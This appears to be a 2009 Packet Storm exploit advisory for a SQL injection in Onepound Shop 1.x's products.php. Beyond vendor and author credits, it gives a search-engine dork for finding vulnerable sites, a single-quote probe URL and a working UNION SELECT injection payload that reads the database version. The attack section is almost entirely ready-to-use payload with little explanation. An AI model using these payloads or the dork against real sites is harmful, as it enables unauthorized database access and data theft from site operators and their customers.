Onepound Shop 1.x SQL Injection

2009-07-14T00:00:00
ID PACKETSTORM:79169
Type packetstorm
Reporter Affix
Modified 2009-07-14T00:00:00

Description

                                        
                                            `#################################################################  
# _______ _________ _ #  
# ( ____ )\__ __/( ( /| #  
# | ( )| ) ( | \ ( | #  
# | (____)| | | | \ | | #  
# | __) | | | (\ \) | #  
# | (\ ( | | | | \ | #  
# | ) \ \__ | | | ) \ | #  
# |/ \__/ )_( |/ )_) #  
# http://root-the.net #  
#################################################################  
#[+] onepund shop 1.x products.php SQL Injection Vulnerability #  
#[+] Vendor : onepound.cn <ttp://www.onepound.cn/> #  
#[+] Exploit : Affix <root@root-the.net> #  
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #  
# str0ke, tekto, SonicX, Android, tw0 #  
#[+] dork : "Powered by OnePound" #  
#################################################################  
  
Example :  
http://site.com/products.php?id='  
  
Demo :  
http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--  
  
  
`